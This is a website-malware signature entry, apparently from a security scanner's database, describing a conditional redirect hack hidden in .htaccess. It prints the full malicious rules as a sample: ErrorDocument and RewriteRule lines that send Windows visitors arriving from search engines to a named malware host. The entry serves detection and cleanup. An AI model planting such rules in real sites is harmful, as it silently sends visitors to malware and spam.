SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwhta3

malware-entry-mwhta3

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from:

http://blog.natebennettfleming.com/ main.php
And other domains.

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove offendin code from .htaccess.

Links::
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

ErrorDocument 500 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=0 ErrorDocument 502 http://blog.natebennettfleming.com/main.php?i=Jc2tgtAbrvymixjzUMtFypEZ&e=2  RewriteCond %{HTTP_REFERER} .google.$ [NC,OR] .. RewriteCond %{HTTP_REFERER} .hotbot.$ [NC,OR] RewriteCond %{HTTP_REFERER} .goto.$ [NC,OR] RewriteCond %{HTTP_REFERER} .infoseek.$ [NC,OR] RewriteCond %{HTTP_REFERER} .mamma.$ [NC,OR] RewriteCond %{HTTP_REFERER} .alltheweb.$ [NC,OR] RewriteCond %{HTTP_REFERER} .lycos.$ [NC,OR] RewriteCond %{HTTP_REFERER} .search.$ [NC,OR] RewriteCond %{HTTP_REFERER} .metacrawler.$ [NC,OR] RewriteCond %{HTTP_REFERER} .mail.$ [NC,OR] RewriteCond %{HTTP_REFERER} .dogpile.$ [NC]  RewriteCond %{HTTP_USER_AGENT} .Windows. RewriteRule .* http://blog.natebennettfleming.com/main.php?h=%{HTTP_HOST}&i=Jc2tgtAbrvymixjzU MtFypEZ&e=r [R,L]